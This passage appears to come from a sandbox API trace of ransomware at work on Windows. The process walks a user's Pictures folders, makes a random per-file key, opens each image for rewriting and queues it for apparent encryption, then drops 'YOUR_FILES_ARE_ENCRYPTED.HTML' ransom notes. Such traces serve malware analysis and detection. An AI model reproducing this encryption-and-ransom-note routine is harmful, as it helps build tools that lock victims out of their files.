ftCreationTime.dwLowDateTime=0xee9a2960, ftCreationTime.dwHighDateTime=0x1d7e67d, ftLastAccessTime.dwLowDateTime=0xdf5c40d0, ftLastAccessTime.dwHighDateTime=0x1d7e71a, ftLastWriteTime.dwLowDateTime=0xdf5c40d0, ftLastWriteTime.dwHighDateTime=0x1d7e71a, nFileSizeHigh=0x0, nFileSizeLow=0x12c4c, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="xYveXQ2BXsCwy5N1dYs.gif", cAlternateFileName="XYVEXQ~1.GIF")) returned 1 [0168.671] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif") returned 91 [0168.671] lstrcmpW (lpString1="xYveXQ2BXsCwy5N1dYs.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.671] PathFindExtensionW (pszPath="xYveXQ2BXsCwy5N1dYs.gif") returned=".gif" [0168.671] lstrlenW (lpString=".gif") returned 4 [0168.671] PathFindExtensionW (pszPath="xYveXQ2BXsCwy5N1dYs.gif") returned=".gif" [0168.671] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.671] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\xyvexq2bxscwy5n1dys.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.673] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=76876) returned 1 [0168.673] GetProcessHeap () returned 0x270000 [0168.673] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.673] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="A3") returned 2 [0168.673] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="C0") returned 2 [0168.673] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="F4") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="67") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="F1") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="D4") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="59") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="D4") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="75") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="E1") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="80") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="3A") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="44") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="99") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd456, 
param_2="%02X" | out: param_1="2A") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="CB") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="EA") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="36") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="3B") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="62") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="3D") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="3A") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="CF") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="A7") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="6E") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="DD") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="1B") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="8F") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="35") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="B6") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="CA") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="5A") returned 2 [0168.675] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif" [0168.675] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.675] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.680] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee9a2960, ftCreationTime.dwHighDateTime=0x1d7e67d, ftLastAccessTime.dwLowDateTime=0xdf5c40d0, ftLastAccessTime.dwHighDateTime=0x1d7e71a, ftLastWriteTime.dwLowDateTime=0xdf5c40d0, ftLastWriteTime.dwHighDateTime=0x1d7e71a, nFileSizeHigh=0x0, nFileSizeLow=0x12c4c, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="xYveXQ2BXsCwy5N1dYs.gif", cAlternateFileName="XYVEXQ~1.GIF")) returned 0 [0168.682] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.683] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0168.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0168.683] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.685] CloseHandle (hObject=0x5b8) returned 1 
[0168.685] GetProcessHeap () returned 0x270000 [0168.686] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.686] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779eccd0, ftCreationTime.dwHighDateTime=0x1d7d917, ftLastAccessTime.dwLowDateTime=0x5ffb9e10, ftLastAccessTime.dwHighDateTime=0x1d7e2c1, ftLastWriteTime.dwLowDateTime=0x5ffb9e10, ftLastWriteTime.dwHighDateTime=0x1d7e2c1, nFileSizeHigh=0x0, nFileSizeLow=0x66b9, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="nOmtcrLUjyQ.jpg", cAlternateFileName="NOMTCR~1.JPG")) returned 1 [0168.686] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg") returned 73 [0168.686] lstrcmpW (lpString1="nOmtcrLUjyQ.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.686] PathFindExtensionW (pszPath="nOmtcrLUjyQ.jpg") returned=".jpg" [0168.686] lstrlenW (lpString=".jpg") returned 4 [0168.686] PathFindExtensionW (pszPath="nOmtcrLUjyQ.jpg") returned=".jpg" [0168.686] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\nomtcrlujyq.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.687] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=26297) returned 1 [0168.687] GetProcessHeap () returned 0x270000 [0168.687] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.688] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | 
out: param_1="38") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0B") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C5") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="93") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EF") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="E5") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="E2") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="9C") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="69") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="4B") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="39") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="32") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="AC") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="4E") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="E9") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="BD") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D6") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="CF") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D6") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A7") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="29") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="4A") returned 2 [0168.689] wsprintfW (in: 
param_1=0x4ebd782, param_2="%02X" | out: param_1="D7") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="C0") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F3") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="72") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="CE") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="73") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="E0") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B9") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D3") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="48") returned 2 [0168.690] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg" [0168.690] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.690] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.700] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c58de0, ftCreationTime.dwHighDateTime=0x1d7dbf7, ftLastAccessTime.dwLowDateTime=0xae55cd90, ftLastAccessTime.dwHighDateTime=0x1d7e124, ftLastWriteTime.dwLowDateTime=0xae55cd90, ftLastWriteTime.dwHighDateTime=0x1d7e124, nFileSizeHigh=0x0, nFileSizeLow=0x15944, dwReserved0=0x1c760c2, 
dwReserved1=0x0, cFileName="P1x_px8M5Vpn6c.jpg", cAlternateFileName="P1X_PX~1.JPG")) returned 1 [0168.700] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg") returned 76 [0168.700] lstrcmpW (lpString1="P1x_px8M5Vpn6c.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.701] PathFindExtensionW (pszPath="P1x_px8M5Vpn6c.jpg") returned=".jpg" [0168.701] lstrlenW (lpString=".jpg") returned 4 [0168.701] PathFindExtensionW (pszPath="P1x_px8M5Vpn6c.jpg") returned=".jpg" [0168.701] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\p1x_px8m5vpn6c.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.701] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=88388) returned 1 [0168.701] GetProcessHeap () returned 0x270000 [0168.701] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.702] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="1A") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="66") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="52") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A3") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="94") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="28") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A4") 
returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="65") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="BA") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="3A") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="77") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="1C") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="08") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="C9") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="11") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B8") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="C7") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B4") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="BD") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="01") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="60") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AF") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8D") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="CC") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="CA") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E6") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AB") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AE") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd79a, 
param_2="%02X" | out: param_1="A7") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="68") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="1D") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0F") returned 2 [0168.704] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg" [0168.704] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.704] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.724] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd90590, ftCreationTime.dwHighDateTime=0x1d7dd69, ftLastAccessTime.dwLowDateTime=0x5a99f3a0, ftLastAccessTime.dwHighDateTime=0x1d7e3ba, ftLastWriteTime.dwLowDateTime=0x5a99f3a0, ftLastWriteTime.dwHighDateTime=0x1d7e3ba, nFileSizeHigh=0x0, nFileSizeLow=0x11b9a, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="u OMCWlP.gif", cAlternateFileName="UOMCWL~1.GIF")) returned 1 [0168.727] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif") returned 70 [0168.727] lstrcmpW (lpString1="u OMCWlP.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.727] PathFindExtensionW (pszPath="u OMCWlP.gif") returned=".gif" [0168.727] lstrlenW (lpString=".gif") returned 4 [0168.727] PathFindExtensionW (pszPath="u OMCWlP.gif") returned=".gif" 
[0168.727] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\u omcwlp.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.728] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=72602) returned 1 [0168.728] GetProcessHeap () returned 0x270000 [0168.728] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.729] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="73") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="6A") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="BE") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="82") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="20") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="81") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="F2") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="7C") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="8D") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="DC") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="25") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0D") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="27") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd75e, 
param_2="%02X" | out: param_1="02") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="D9") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="40") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="25") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="26") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B9") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="EA") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="CB") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="61") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="ED") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="04") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="2E") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="DE") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="07") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="6D") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="17") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="76") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="EA") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="11") returned 2 [0168.730] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif" [0168.730] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.730] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd90590, ftCreationTime.dwHighDateTime=0x1d7dd69, ftLastAccessTime.dwLowDateTime=0x5a99f3a0, ftLastAccessTime.dwHighDateTime=0x1d7e3ba, ftLastWriteTime.dwLowDateTime=0x5a99f3a0, ftLastWriteTime.dwHighDateTime=0x1d7e3ba, nFileSizeHigh=0x0, nFileSizeLow=0x11b9a, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="u OMCWlP.gif", cAlternateFileName="UOMCWL~1.GIF")) returned 0 [0168.739] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.740] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0168.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0168.741] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.743] CloseHandle (hObject=0x598) returned 1 [0168.743] GetProcessHeap () returned 0x270000 